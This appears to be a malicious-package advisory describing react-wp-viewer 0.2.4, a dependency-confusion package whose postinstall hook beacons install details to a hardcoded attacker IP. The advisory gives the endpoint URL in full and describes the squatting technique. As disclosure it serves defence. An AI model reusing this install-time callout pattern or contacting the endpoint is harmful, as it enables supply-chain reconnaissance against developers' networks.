MAL-2026-6571

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (443f37b7957fe3f1d4dd836b3a0e6eeddb513e334700e0c0a4616570071c13d8) react-wp-viewer 0.2.4 is a dependency-confusion package. Its postinstall hook performs an HTTP GET to a hardcoded bare-IP endpoint at http://130.49.177.51:18080/p/dc-20260627-yandex-geobase carrying the package name, version, and a fixed nonce. The package self-identifies as a dependency-confusion proof-of-concept (`__dependency_confusion_poc__: true`) and the URL path encodes a campaign identifier referencing an internal package namespace, indicating the public name is being squatted to win resolution against an identically-named private/internal package. Any build that resolves `react-wp-viewer` from the public registry will silently execute the postinstall beacon, disclosing the installer's source IP, hostname-derived network position, and the fact that this internal name resolves within their environment, to an attacker-controlled host over plain HTTP. No installer credentials are read in the traced code, but the install-time callout to an attacker-controlled IP is the dependency-confusion attack pattern and provides material reconnaissance value to the operator.